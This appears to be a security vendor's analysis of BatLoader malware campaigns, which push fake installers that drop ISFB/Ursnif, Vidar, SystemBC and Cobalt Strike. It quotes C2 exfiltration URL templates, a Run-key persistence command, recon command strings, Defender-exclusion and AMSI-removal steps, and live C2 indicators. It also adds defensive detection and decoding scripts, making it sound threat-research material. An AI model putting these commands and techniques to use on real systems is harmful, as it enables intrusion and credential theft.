BatLoader, first reported in February 2022, is a malware dropper that has been observed delivering several well-known malware families and malicious tools, including ISFB, SystemBC RAT, Redline Stealer, and Vidar Stealer. Because its MSI installer is over 100 MB in size, BatLoader can easily evade most sandboxes and antivirus tools.
This malware analysis delves deeper into the technical details of how BatLoader operates and gives our security recommendations to protect your organization from being exploited.
In September 2022, eSentire TRU observed multiple BatLoader infections in Consumer Services, Retail, Telecommunications, and Non-Profit client environments. The initial infection starts with the user searching for installers such as Zoom, TeamViewer, AnyDesk, or FileZilla. The user clicks the first advertisement displayed, which redirects to the website hosting the fake installer. The MSI installers are signed by “Kancelaria Adwokacka Adwokat Aleksandra Krzemińska” (Figures 1-2).
In October and November 2022, we observed the second BatLoader campaign pushing fake installers such as TeamViewer (Figure 3), AnyDesk and LogMeIn. The infections were observed in Insurance, Consulting, Healthcare, and Printing industries.
We also observed several C2 domains related to BatLoader campaigns:
BatLoader was named and first described by Mandiant in February 2022. It is worth noting that Mandiant reported the domain clouds222[.]com for the BatLoader campaign, which also overlaps with a Zloader C2 domain.
eSentire TRU observed BatLoader dropping the following malware / malicious tools:
The MSI installer file is over 100 MB in size; the threat actor(s) inflate it to this size to evade sandboxes and antivirus products. The properties of the BatLoader MSI installer are shown in Figure 5. Within the MSI file, we found the components of NovaPDF 11 (Figure 6) and other junk files (Figure 7). These files are written to C:\Program Files (x86)\Softland\novaPDF 11\Tools, a path created once the malicious MSI runs successfully; we also found NordVPNSetup.exe dropped within the same path. We believe these files are used as a decoy.
The main malicious trigger for the MSI installer resides in the CustomAction table. Custom actions are operations defined by the package author that run during installation or MSI execution. The malicious actor(s) create a custom action that runs an inline PowerShell script. The script resides under the action name AI_DATA_SETTER and contains the instructions to download the malicious update.bat file from the C2 domain and place it in the AppData\Roaming folder (Figure 8). The script is run via PowerShell Core (pwsh.exe) in a hidden window.
The downloaded update.bat file is responsible for downloading the requestadmin.bat file and the NirCmd.exe binary (Figure 9).
The requestadmin.bat file performs antivirus tampering: it adds the %APPDATA% and %USERPROFILE%\ paths to the Windows Defender exclusion list to prevent Defender from scanning them. The batch file is executed via nircmd.exe, which is also downloaded from the C2; the utility allows the batch file to run in the background without displaying a window. Besides excluding the paths, the batch file also retrieves and executes the runanddelete.bat and scripttodo.ps1 scripts from the C2 via the native PowerShell cmdlet Invoke-WebRequest (Figure 10).
The scripttodo.ps1 script installs GnuPG, software that encrypts and signs data and communications, as shown in Figure 11.
Further down, the script enumerates the domain the user is logged into and the username, and obtains all entries in the ARP cache table whose IPs start with the prefixes 192., 10. and 172. Once that is done, it counts the IPs found in the ARP table and performs a sum operation to obtain the count ($IP_count).
The requests to the C2 server are performed in the following format:
https://<C2 Server>/g5i0nq/index/d2ef590c0310838490561a205469713d/?servername=msi&arp="+ $IP_count + "&domain=" + $UserDomain + "&hostname=" + $UserPCname
https://<C2 Server>/g5i0nq/index/fa0a24aafe050500595b1df4153a17fb/?servername=msi&arp="+ $IP_count + "&domain=" + $UserDomain + "&hostname=" + $UserPCname
https://<C2 Server>/g5i0nq/index/i850c923db452d4556a2c46125e7b6f2/?servername=msi&arp="+ $IP_count + "&domain=" + $UserDomain + "&hostname=" + $UserPCname
https://<C2 Server>/g5i0nq/index/b5e6ec2584da24e2401f9bc14a08dedf/?servername=msi&arp="+ $IP_count + "&domain=" + $UserDomain + "&hostname=" + $UserPCname
If the mentioned conditions are not satisfied, the script retrieves the GPG-encrypted files:
If all the conditions are met, the script retrieves the following files:
We were unable to retrieve the shutdowni.bat file, but we believe the script may have been deployed to restart the host.
The GPG decryption routine was borrowed from a script hosted on GitHub (Figure 13). The script looks for files ending in .gpg in the %APPDATA% folder and decrypts them using the password 105b.
Moreover, scripttodo.ps1 recursively removes the registry key that registers Windows Defender's IOfficeAntiVirus provider, HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}. The IOfficeAntiVirus component is responsible for detecting malicious or suspicious files downloaded from the Internet. The script then adds extensions such as .exe and .dll to the Windows Defender exclusion list. Additionally, it downloads the NSudo.exe tool in order to run files and programs with full privileges.
Besides scripttodo.ps1, the runanddelete.bat file (Figure 14) is retrieved. The batch file runs the malicious executable d2ef5.exe with administrator privileges by creating a VBS script, getadmin.vbs, under the %TEMP% folder to launch the binary; the user first receives a User Account Control (UAC) prompt asking to allow the program to make changes.
The binary d2ef5.exe is the ISFB banking malware, also known as the successor of Gozi or Ursnif. The first Gozi variant was discovered by SecureWorks in 2007, and the family is still active today, spreading through phishing emails and loaders. The Ursnif version we observed can exfiltrate browser credentials and cookies, Thunderbird and Outlook profiles, and POP3 and SMTP passwords. The strings “*terminal* *wallet* *bank* *banco*” were also observed, which suggests that Ursnif is also capable of stealing cryptocurrency from digital wallets and banking credentials.
Upon execution, ISFB creates persistence via a Registry Run key under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run. In our sample the registry value is named VirtualStop (the value name varies, as it is built from the wordlist table hardcoded in the binary). The value contains a command that launches a shortcut (LNK) whose target is powershell.exe, referenced by relative path. PowerShell then starts the CollectMirrow.ps1 script under the %USERPROFILE% folder, bypassing PowerShell’s execution policy.
The command execution example:
cmd /c start C:\Users\<username>\VirtualStop.lnk -ep unrestricted -file C:\Users\<username>\CollectMirrow.ps1
The CollectMirrow.ps1 script contains a PowerShell one-liner (Figure 15) that pulls the data written to the registry under HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\<registry_value>, specifically the TestMouse value (Figure 16).
The script performs process injection using APIs such as OpenThread (to obtain a handle to a thread of the target process), VirtualAlloc (to allocate memory in the chosen process), and QueueUserAPC. The thread to which the APC (Asynchronous Procedure Call) is queued must enter an alertable state, which is achieved by invoking SleepEx, as shown in Figure 17.
We have observed ISFB injecting itself into a running explorer.exe process. The unpacked sample is approximately 540 KB (MD5: 3aaf34ffbe45e4f54b37392ad1afe9a5). Daniel Bunce has published very well-written analyses of ISFB; here we will cover only the main basics of the malware.
The payload locates the .bss section, which is where the encrypted strings reside, within the function shown in Figure 18 (the byte sequence 81 38 2E 62 73 73 includes the ASCII bytes 2E 62 73 73, i.e. ‘.bss’).
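The Defender exclusions added by requestadmin.bat, the AMSI provider key removed by scripttodo.ps1, and the Run key persistence described above all leave registry and Defender configuration events behind. The following Python is an added example (written for this post, not eSentire's detection content) that runs a few rules over constructed, simplified Sysmon/Defender-style event records; the event shapes and field names are assumptions chosen for the example, not a real log schema.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample telemetry (not from the page's cases) in a simplified,
# Sysmon/Defender-like shape: source, event id, and the few fields the rules need.
SAMPLE_EVENTS: List[Dict] = [
    # Windows Defender event 5007 (configuration change): path exclusion added
    {"source": "Defender", "event_id": 5007,
     "message": r"New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\alice\AppData\Roaming = 0x0"},
    # Defender 5007: extension exclusion added
    {"source": "Defender", "event_id": 5007,
     "message": r"New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions\.exe = 0x0"},
    # Sysmon event 12 (registry key create/delete): AMSI provider registration removed
    {"source": "Sysmon", "event_id": 12, "event_type": "DeleteKey",
     "target": r"HKLM\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}",
     "image": r"C:\Program Files\PowerShell\7\pwsh.exe"},
    # Sysmon event 13 (registry value set): Run key launching an LNK with an execution-policy bypass
    {"source": "Sysmon", "event_id": 13, "event_type": "SetValue",
     "target": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\VirtualStop",
     "details": r"cmd /c start C:\Users\alice\VirtualStop.lnk -ep unrestricted -file C:\Users\alice\CollectMirrow.ps1"},
    # Benign noise: an ordinary Run key entry that must not alert
    {"source": "Sysmon", "event_id": 13, "event_type": "SetValue",
     "target": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "details": r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"},
]

RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run\\", re.IGNORECASE)
AMSI_PROVIDERS_RE = re.compile(r"\\SOFTWARE\\Microsoft\\AMSI\\Providers\\", re.IGNORECASE)
DEFENDER_PATH_EXCL_RE = re.compile(r"\\Exclusions\\Paths\\(.+?) = ", re.IGNORECASE)
DEFENDER_EXT_EXCL_RE = re.compile(r"\\Exclusions\\Extensions\\(\.\w+) = ", re.IGNORECASE)
# Broad, user-writable or whole-OS roots of the kind the campaigns exclude
# (%APPDATA%, %USERPROFILE%, %TEMP%, C:\Windows\*), matched on the expanded path.
SUSPICIOUS_EXCL_PATH_RE = re.compile(
    r"(\\AppData\\|\\Users\\[^\\]+\\?$|\\Temp\\|^C:\\Windows\\\*)", re.IGNORECASE)
SUSPICIOUS_EXTS = {".exe", ".dll", ".ps1"}
# "-ep unrestricted" / "-ExecutionPolicy bypass" style arguments in a Run key command
PS_BYPASS_RE = re.compile(r"-e(?:p|xecutionpolicy)\s+(unrestricted|bypass)", re.IGNORECASE)


def evaluate(events: List[Dict]) -> List[Tuple[str, str, str]]:
    """Return (rule name, ATT&CK technique id, matched object) for each event that fires a rule."""
    findings = []
    for ev in events:
        if ev["source"] == "Defender" and ev["event_id"] == 5007:
            msg = ev.get("message", "")
            m = DEFENDER_PATH_EXCL_RE.search(msg)
            if m and SUSPICIOUS_EXCL_PATH_RE.search(m.group(1)):
                findings.append(("defender_path_exclusion", "T1562.001", m.group(1)))
            m = DEFENDER_EXT_EXCL_RE.search(msg)
            if m and m.group(1).lower() in SUSPICIOUS_EXTS:
                findings.append(("defender_extension_exclusion", "T1562.001", m.group(1)))
        elif ev["source"] == "Sysmon" and ev["event_id"] == 12 and ev.get("event_type") == "DeleteKey":
            if AMSI_PROVIDERS_RE.search(ev["target"]):
                findings.append(("amsi_provider_removed", "T1562.001", ev["target"]))
        elif ev["source"] == "Sysmon" and ev["event_id"] == 13:
            if RUN_KEY_RE.search(ev["target"]) and PS_BYPASS_RE.search(ev.get("details", "")):
                findings.append(("run_key_powershell_bypass", "T1547.001", ev["target"]))
    return findings


if __name__ == "__main__":
    for rule, technique, obj in evaluate(SAMPLE_EVENTS):
        print(f"{technique} {rule}: {obj}")
```

The rules key on the objects the campaign touches rather than on file names (update.bat, scripttodo.ps1), which the actor has already changed once between campaigns; a Defender 5007 event for an exclusion under a user profile, or a key deletion under AMSI\Providers, is a better long-term signal than any hash.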
The data stored in the BSS section is encoded as shown in Figure 19.
The decryption function can be represented by the following pseudocode:
The decryption function takes 4 bytes of the encrypted data in the BSS section at a time and converts them into an integer, then subtracts the key from the index value and adds the result to that DWORD (4-byte) value.
The decompiled code is shown in Figure 21. The decryption function is thoroughly described by 0verfl0w (Daniel Bunce). Part of the key is derived from division operations on the value retrieved from the GetSystemTimeAsFileTime API call (the system time). Another part of the key is embedded in our payload: 0x81b8e7da. Applying the embedded key (Figure 22) and the part derived from the system time (which is 19) to the decryption function gave us the decrypted data (Figure 23).
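To make the DWORD-at-a-time description concrete, here is an added Python model of that routine (written for this post; it is neither the malware's code nor 0verfl0w's script). It assumes that the index is the byte offset of the DWORD within the .bss blob and that the combined key is a single 32-bit value; the page gives the embedded part (0x81b8e7da) and the time-derived part (19) but not how they are combined, so the example takes the combined key as a parameter and, on constructed data, uses the embedded part alone.

```python
import struct
from typing import List

MASK32 = 0xFFFFFFFF
EMBEDDED_KEY = 0x81B8E7DA   # embedded key part reported for the analyzed payload


def decrypt_bss(blob: bytes, key: int) -> bytes:
    """Decrypt a .bss string blob: for each little-endian DWORD at byte offset
    idx, the plaintext DWORD is (DWORD + (idx - key)) mod 2^32.
    ASSUMPTION: idx is the byte offset of the DWORD within the blob."""
    if len(blob) % 4:
        raise ValueError("blob length must be a multiple of 4")
    out = bytearray()
    for idx in range(0, len(blob), 4):
        (dword,) = struct.unpack_from("<I", blob, idx)
        out += struct.pack("<I", (dword + (idx - key)) & MASK32)
    return bytes(out)


def encrypt_bss(plain: bytes, key: int) -> bytes:
    """Inverse transform; used here only to build constructed test data."""
    padded = plain + b"\x00" * (-len(plain) % 4)
    out = bytearray()
    for idx in range(0, len(padded), 4):
        (dword,) = struct.unpack_from("<I", padded, idx)
        out += struct.pack("<I", (dword - (idx - key)) & MASK32)
    return bytes(out)


def split_strings(decrypted: bytes) -> List[str]:
    """The decrypted region is a run of NUL-terminated strings; return them in order."""
    return [s.decode("latin-1") for s in decrypted.split(b"\x00") if s]


if __name__ == "__main__":
    # Constructed plaintext standing in for the .bss contents of a sample
    sample = encrypt_bss(b"explorer.exe\x00*terminal* *wallet*\x00", EMBEDDED_KEY)
    print(split_strings(decrypt_bss(sample, EMBEDDED_KEY)))
```

Because the key depends on the system time, a wrong time-derived part shifts every DWORD by the same amount, which is why decrypted output with a bad key is uniformly garbled rather than partly readable; trying candidate values until NUL-terminated ASCII appears is the usual way to recover it.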
The second decompressed data blob contains the following:
C2: trackingg-protectioon.cdn1.mozilla[.]net, 45.8.158[.]104, trackingg-protectioon.cdn1.mozilla[.]net, 188.127.224[.]114, weiqeqwns[.]com, wdeiqeqwns[.]com, weiqeqwens[.]com, weiqewqwns[.]com, iujdhsndjfks[.]com
Botnet ID: 10101
Server ID: 50
Key: T3H5l6EZGEh6GkB5
Directory: /uploaded
Extension: .dib, .pct (beacon extension)
Sleep time: 1 second
ConfigTimeout (time interval to check for a new configuration): 20 seconds
The third blob contains the wordlist values shown below:
['list', 'stop', 'computer', 'desktop', 'system', 'service', 'start', 'game', 'stop', 'operation', 'black', 'line', 'white', 'mode', 'link', 'urls', 'text', 'name', 'document', 'type', 'folder', 'mouse', 'file', 'paper', 'mark', 'check', 'mask', 'level', 'memory', 'chip', 'time', 'reply', 'date', 'mirrow', 'settings', 'collect', 'options', 'value', 'manager', 'page', 'control', 'thread', 'operator', 'byte', 'char', 'return', 'device', 'driver', 'tool', 'sheet', 'util', 'book', 'class', 'window', 'handler', 'pack', 'virtual', 'test', 'active', 'collision', 'process', 'make', 'local', 'core']
These words are used to build the registry value names.
Another interesting feature of ISFB is that it stores three embedded binaries within the unpacked payload. The binaries are compressed using the aPLib compression algorithm. The decompression function is shown in Figure 24.
To locate the embedded compressed binaries, we need to find the structure in the ISFB payload where it stores the configuration. The configuration contains the payload marker (header), XOR key, CRC32 hash, and the offset and size of each compressed binary (Figure 25). The payload marker defines the ISFB version:
FJ – old ISFB version
J1 – old ISFB version
J2 – DreamBot version
J3 – ISFB v3 Japan
JJ – ISFB v2.14 and above
WD – RM3
The compressed data blobs are separated by null bytes, as shown in Figure 26. Something resembling C2 domains is visible in the first blob.
We wrote a Python script to extract the compressed data and decompress it (Figure 27). The first compressed blob contains the RSA public key with the hash 0xe1285e64 (Figure 28).
ISFB also stores the configuration within the function that parses the payload header (Figure 29). The hash values are calculated by XORing the value 0x69b25f44 (known as g_CsCookie in the leaked code) with the values that match CRC_CLIENT32 (also from the leaked code).
The following are the payload hashes resulting from the XOR:
0x11271c7f – timer
0x48295783 – timer
0x584e5925 – botnet
0x556aed8f – server
0x4fa8693e – key
0xd0665bf6 – domains
0x54432e74 – directory
0xbbb5c71d – extension
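The header walk described above (marker, XOR key, CRC32 hash, offset, size per embedded blob; hash identified via g_CsCookie) is shown below as an added Python example for this post, not the script from Figure 27. The record layout (2-byte marker, 2 reserved bytes, then four little-endian DWORDs), the DWORD alignment used when scanning, and the convention that the binary stores the post-XOR hash values listed on the page are all assumptions; the markers, hash values and cookie are the page's. aPLib decompression is not reproduced, so the extracted blobs are returned still compressed.

```python
import struct
from typing import List, NamedTuple, Optional

G_CSCOOKIE = 0x69B25F44  # g_CsCookie from the leaked code, as given on the page

# Payload markers and the ISFB versions they denote (from the page)
MARKERS = {
    b"FJ": "old ISFB", b"J1": "old ISFB", b"J2": "DreamBot",
    b"J3": "ISFB v3 Japan", b"JJ": "ISFB v2.14 and above", b"WD": "RM3",
}

# Post-XOR hash values and the configuration element each identifies (from the page)
KNOWN_HASHES = {
    0x11271C7F: "timer", 0x48295783: "timer", 0x584E5925: "botnet",
    0x556AED8F: "server", 0x4FA8693E: "key", 0xD0665BF6: "domains",
    0x54432E74: "directory", 0xBBB5C71D: "extension",
}

# ASSUMED record layout (little-endian), following the field list on the page:
#   marker[2]  reserved[2]  xor_key  crc32_hash  offset  size
RECORD = struct.Struct("<2sHIIII")


class Record(NamedTuple):
    marker: bytes
    version: str
    xor_key: int
    stored_hash: int    # value as stored in the binary
    crc_client32: int   # stored_hash ^ g_CsCookie, i.e. the CRC_CLIENT32 constant
    offset: int
    size: int
    name: Optional[str]


def find_config_table(payload: bytes) -> Optional[int]:
    """Scan DWORD-aligned offsets (assumed alignment) for a known marker whose
    offset/size fields point inside the payload; return the table position."""
    for pos in range(0, len(payload) - RECORD.size + 1, 4):
        if payload[pos:pos + 2] in MARKERS:
            _, _, _, _, off, size = RECORD.unpack_from(payload, pos)
            if size and off + size <= len(payload):
                return pos
    return None


def parse_records(payload: bytes, table_pos: int) -> List[Record]:
    """Read consecutive records until a byte pair that is not a known marker."""
    records = []
    pos = table_pos
    while pos + RECORD.size <= len(payload):
        marker, _, xor_key, h, off, size = RECORD.unpack_from(payload, pos)
        if marker not in MARKERS or off + size > len(payload):
            break
        records.append(Record(marker, MARKERS[marker], xor_key, h,
                              h ^ G_CSCOOKIE, off, size, KNOWN_HASHES.get(h)))
        pos += RECORD.size
    return records


def extract_blob(payload: bytes, rec: Record) -> bytes:
    """Return the (still aPLib-compressed) bytes a record points at."""
    return payload[rec.offset:rec.offset + rec.size]


def build_sample_payload() -> bytes:
    """Constructed payload image: a stub header, a two-record table at offset 32,
    then the two data blobs (plain text stands in for compressed data)."""
    header = b"MZ" + b"\x00" * 30
    blob_domains = b"weiqeqwns.com\x00weiqeqwens.com\x00"
    blob_botnet = b"10101"
    table_off = len(header)
    data_off = table_off + 2 * RECORD.size
    table = RECORD.pack(b"JJ", 0, 0x1234ABCD, 0xD0665BF6, data_off, len(blob_domains))
    table += RECORD.pack(b"JJ", 0, 0x1234ABCD, 0x584E5925,
                         data_off + len(blob_domains), len(blob_botnet))
    return header + table + blob_domains + blob_botnet


if __name__ == "__main__":
    image = build_sample_payload()
    pos = find_config_table(image)
    for rec in parse_records(image, pos):
        print(rec.version, rec.name, hex(rec.crc_client32), extract_blob(image, rec))
```

On a real unpacked sample the same walk is run over the payload bytes, and the XOR with g_CsCookie is what lets the hash list above be reused across builds even though the stored values change with the cookie.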
The beacon contains the following pattern, which is encrypted with the AES key extracted from the compressed blob:
soft=%u&version=%u&user==%08x%08x%08x%08x &server=50&id=10101&crc=61f03b3&uptime=102696&action=%08x&dns=%s&whoami=%s&os=%s
soft, version – version of the payload
user – a value calculated by applying the RNG (random number generator) algorithm to the username and computer name, with XOR operations and a cpuid call
server – server ID
id – botnet ID
uptime – a value derived from the QueryPerformanceFrequency and QueryPerformanceCounter API calls
dns – computer name
os – OS version and system type
An example of an AES-128-encrypted beacon follows; in the encoded path, + is replaced with _2B and / with _2F, and additional / characters are inserted as separators:
/uploaded/V1jd62QM3JcPMZGTpdjl2I/mEcoduKcJlNZo/S1Tq0KYy/M2ZEZFPG3iasm8TVeZ5oYf7/m_2FHfl318/E2HneynLJsT2KcKW6/MBeMivC1RFEh/TAL8bLaLD_2/B1Hg1OTg4XQwlG/IJbZJIe0rxQ0SYwzWgYte/TfzvWXXywf9HHwRL/2ZSv_2BcgktHGaZ/hRo7dwwYV3D39_2Bmc/JmEz3Z359/UhGcxj4s_2F80Krry3Kf/tI6i_2BxIXB2d6WASfJ/NCIpYT61pYgL53jx8SghJH/pQnAADp6racXs/VdB_2FRy/o74GaLVJG9neXweATdYNR/5.pct
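The transport encoding around the AES ciphertext (base64 with + and / rewritten as _2B and _2F, then / separators inserted) has to be undone before the ciphertext can be decrypted. The Python below is an added example for this post, not ISFB's or eSentire's code, that recovers the raw ciphertext from the beacon path shown above and checks that its length fits the AES block size; the directory and extensions are the page's, while the decoder's handling of a separator landing inside a token (the sample contains "_2/B") is the point the example exists to show. The AES decryption itself is not reproduced.

```python
import base64
from typing import Sequence

# Beacon transport parameters from the page's extracted configuration
BEACON_DIRECTORY = "/uploaded"
BEACON_EXTENSIONS = (".dib", ".pct")

# Beacon URI path as captured on the page
SAMPLE_BEACON_PATH = (
    "/uploaded/V1jd62QM3JcPMZGTpdjl2I/mEcoduKcJlNZo/S1Tq0KYy/M2ZEZFPG3iasm8TVeZ5oYf7"
    "/m_2FHfl318/E2HneynLJsT2KcKW6/MBeMivC1RFEh/TAL8bLaLD_2/B1Hg1OTg4XQwlG"
    "/IJbZJIe0rxQ0SYwzWgYte/TfzvWXXywf9HHwRL/2ZSv_2BcgktHGaZ/hRo7dwwYV3D39_2Bmc"
    "/JmEz3Z359/UhGcxj4s_2F80Krry3Kf/tI6i_2BxIXB2d6WASfJ/NCIpYT61pYgL53jx8SghJH"
    "/pQnAADp6racXs/VdB_2FRy/o74GaLVJG9neXweATdYNR/5.pct"
)


def beacon_path_to_ciphertext(path: str, directory: str = BEACON_DIRECTORY,
                              extensions: Sequence[str] = BEACON_EXTENSIONS) -> bytes:
    """Undo the transport encoding of a beacon path to recover the AES ciphertext.
    Order matters: the inserted '/' separators are removed FIRST, because one can
    land inside a substitution token ('_2/B' in the captured sample)."""
    if not path.startswith(directory + "/"):
        raise ValueError("path does not start with the configured directory")
    body = path[len(directory) + 1:]
    ext = next((e for e in extensions if body.endswith(e)), None)
    if ext is None:
        raise ValueError("unexpected beacon extension")
    body = body[:-len(ext)]
    joined = body.replace("/", "")                         # drop separators
    b64 = joined.replace("_2B", "+").replace("_2F", "/")  # restore base64 alphabet
    b64 += "=" * (-len(b64) % 4)                           # the beacon omits padding
    return base64.b64decode(b64)


def ciphertext_to_beacon_path(ciphertext: bytes, seg_lengths: Sequence[int],
                              directory: str = BEACON_DIRECTORY, ext: str = ".pct") -> str:
    """Forward direction, used to build constructed test data: base64 without padding,
    '+' -> '_2B', '/' -> '_2F', then '/' separators inserted at the given run lengths
    (a boundary may fall inside a token, mirroring the captured sample)."""
    s = base64.b64encode(ciphertext).decode("ascii").rstrip("=")
    s = s.replace("+", "_2B").replace("/", "_2F")
    segments, i, k = [], 0, 0
    while i < len(s):
        n = seg_lengths[k % len(seg_lengths)]
        segments.append(s[i:i + n])
        i += n
        k += 1
    return directory + "/" + "/".join(segments) + ext


def aes_block_aligned(ciphertext: bytes) -> bool:
    """Consistency check with the page's AES description: block-mode output is a multiple of 16 bytes."""
    return len(ciphertext) > 0 and len(ciphertext) % 16 == 0


if __name__ == "__main__":
    ct = beacon_path_to_ciphertext(SAMPLE_BEACON_PATH)
    print(len(ct), "bytes of ciphertext, block aligned:", aes_block_aligned(ct))
```

The captured path decodes to 224 bytes, 14 AES blocks, which is the kind of sanity check worth applying before spending time on a decryption attempt: a length that is not a multiple of 16 means the separators or tokens were not stripped correctly.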
Some interesting strings found in the sample:
/data.php?version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
\Software\Microsoft\Windows\CurrentVersion
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
%APPDATA%\Mozilla\Firefox\Profiles
EnableSPDY3_0
\Macromedia\Flash Player\
cookies.sqlite
cookies.sqlite-journal
Mozilla\Firefox\Profiles
Microsoft\Edge\User Data\Default
Google\Chrome\User Data\Default
--use-spdy=off --disable-http2
Cmd %s processed: %u
Cmd %u parsing: %u
cmd /C "%s> %s1"
wmic computersystem get domain |more
systeminfo.exe
tasklist.exe /SVC >
driverquery.exe >
reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >
cmd /U /C "type %s1 > %s & del %s1"
net view >
nslookup 127.0.0.1 >
nslookup myip.opendns.com resolver1.opendns.com
net config workstation >
nltest /domain_trusts >
nltest /domain_trusts /all_trusts >
net view /all /domain >
net view /all >
user_pref("network.http.spdy.enabled", false);
Software\Microsoft\Windows Mail
Software\Microsoft\Windows Live Mail
account{*}.oeaccount
Account_Name
encryptedUsername
SMTP_Email_Address
encryptedPassword
EmailAddressCollection/EmailAddress[%u]/Address
Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\
Account Name
IMAP Server
IMAP Password
IMAP Use SSL
POP3 Server
POP3 Password
POP3 Use SSL
SMTP Server
SMTP Password
SMTP Use SSL
%PROGRAMFILES%\Mozilla Thunderbird
%USERPROFILE%\AppData\Roaming\Thunderbird\Profiles\*.default
\logins.json
/C pause dll
cache2\entries\*.*
cmd /c start %s -ep unrestricted -file %s
new-alias -name %s -value gp;new-alias -name %s -value iex;%s ([System.Text.Encoding]::ASCII.GetString((%s "HKCU:\%s").%S))
ipconfig /all
file://c:\test\test32.dll
file://c:\test\tor64.dll
30, 8, *terminal* *wallet* *bank* *banco*
Man-in-the-browser is another capability of Ursnif. You might have noticed strings such as “user_pref("network.http.spdy.enabled", false);”, “EnableSPDY3_0” and “--use-spdy=off --disable-http2”. Ursnif disables SPDY and HTTP/2 (the successor of the SPDY protocol) on the infected host. These protocols use HTTP data compression to achieve minimal latency; with them enabled, the threat actor(s) would have to spend additional effort intercepting and modifying the web traffic.
We still see some remnants of Ursnif DreamBot in ISFB v2 (file://c:\test\tor64.dll), which might suggest that Tor communication capability is still possible.
Botnet: 1259
Version: 54.7
C2: t[.]me/trampapanam, nerdculture[.]de/@yoxhyp
Upon successful infection, the host first reaches out to the C2 and retrieves the DLL (Dynamic Link Library) dependencies, such as vcruntime140.dll, sqlite3.dll, softokn3.dll, nss3.dll, msvcp140.dll, mozglue.dll and freebl3.dll, which the stealer needs to extract credentials and cookies from browsers and to function properly. If you are interested in understanding in more depth what each library is responsible for, you can review our blog on Mars Stealer.
The stealer then collects credentials, host information, files, and a screenshot and sends them to the C2 as a base64-encoded ZIP archive, as shown in Figure 30.
We are in the process of completing a technical analysis of Vidar Stealer, which will be our next blog.
Syncro RMM is a Remote Monitoring and Management tool used to control and manage devices remotely. In the hands of a malicious actor, it can be used as a persistence mechanism and for remote access.
SystemBC RAT, also known as “socks5 backconnect system” (MD5: 8ea797eb1796df20d4bdcadf0264ad6c), is malware that leverages SOCKS5 proxies to hide malicious traffic; it also has the capability of delivering additional payloads to the host (Figure 31).
The RAT creates the mutex “wow64” with “start” as an argument (“start” is also used as an argument for the scheduled task command). If the mutex is not present, the RAT reaches out to the C2. The C2 configuration is shown below:
HOST1: 188.127.224.46
HOST2: hgfiudtyukjnio[.]com
PORT1: 4251
TOR: 0
If the mutex is present on the host, execution proceeds to check the integrity level of the current malicious process and compares it to the value 1000, which is SECURITY_MANDATORY_LOW_RID (low integrity level, SID: S-1-16-0); this means the process is restricted and has limited write permissions.
SystemBC is capable of executing scripts and commands retrieved from C2 such as ps1, bat, vbs, and exe (Figure 33).
The second campaign we observed is slightly different from the first one. The MSI installer (MD5: 099483061f8321e70ce86c9991385f48), signed “Tax In Cloud sp. z o.o.”, does not come with an embedded PowerShell script. Instead, the installer drops the “avolkov.exe” binary on the infected machine and creates a registry key containing the path of the dropped binary, AppData/Local/SetupProject1 (Figure 34).
The avolkov.exe binary (MD5: d41e0fee0ec6c2e3da56a6dcf53607da) uses libcurl 7.85.0, which enables data transfer with URL syntax for protocols such as HTTP/HTTPS, FTP, DICT, SMTP, IMAP, POP3 and LDAP, so the binary can act as a backdoor and loader. The C2 is embedded inside the binary, and from it the binary retrieves the newtest.bat file (Figure 35). The batch script is responsible for pulling additional BatLoader payloads and scripts from the C2, such as:
The requestadmin.bat (Figure 36) retrieved in the second campaign differs from the first campaign’s. The threat actor(s) added more paths and folders to the Windows Defender exclusion list, including %TEMP% and C:\Windows\*, and also added the .ps1 (PowerShell) extension to the exclusion list.
We observed that the script retrieves NSudo and modifies the Windows UAC prompt behavior, allowing administrators to perform operations without authentication or consent prompts:
The script also no longer pulls the runanddelete.bat file from the C2.
The scripttodo.ps1 file still retrieves the same files from the C2, except that the Cobalt Strike payload (d655) was changed from an EXE to a DLL and shutdowni.bat is no longer pulled from the C2.
user.ps1 (Figure 37) is similar to scripttodo.ps1 in that it enumerates the current domain of the host, the username, and the ARP table.
Interestingly enough, we have observed QakBot using the same ordinal name to run Cobalt Strike payloads.
Another new addition to BatLoader is the antivirus check script (checkav.ps1). The script checks the host against a list of antivirus products and sends the result to the C2 server (Figure 38).
Later, the threat actor(s) switched from externalchecksso[.]com to internalchecksso[.]com. scripttodo.ps1 was also renamed ru.ps1, and the malicious binaries were renamed as shown in Figure 39.
Our Threat Response Unit (TRU) combines threat intelligence obtained from continuous research and security incidents to create practical outcomes for our customers. We are taking a full-scale response approach to ongoing cybersecurity threats by deploying countermeasures, such as:
Our detection content is supported by investigation runbooks, ensuring our 24/7 SOC Cyber Analysts respond rapidly to any intrusion attempts related to known malware Tactics, Techniques, and Procedures. In addition, TRU closely monitors the threat landscape and constantly addresses capability gaps and conducts retroactive threat hunts to assess customer impact.
We recommend implementing the following controls to help secure your organization against BatLoader malware:
While the TTPs used by adversaries grow in sophistication, they create difficult situations in which critical business decisions must be made. Preventing the various attack paths utilized by the modern threat actor requires actively monitoring the threat landscape, developing and deploying endpoint detection, and the ability to investigate logs and network data during active intrusions.
eSentire’s TRU is a world-class team of threat researchers who develop new detections enriched by original threat intelligence and leverage new machine learning models that correlate multi-signal data and automate rapid response to advanced threats.
If you are not currently engaged with an MDR provider, eSentire MDR can help you reclaim the advantage and put your business ahead of disruption.
| Name | Indicators |
|---|---|
| BatLoader C2 | updatea1[.]com |
| BatLoader C2 | externalchecksso[.]com |
| BatLoader C2 | internalcheckssso[.]com |
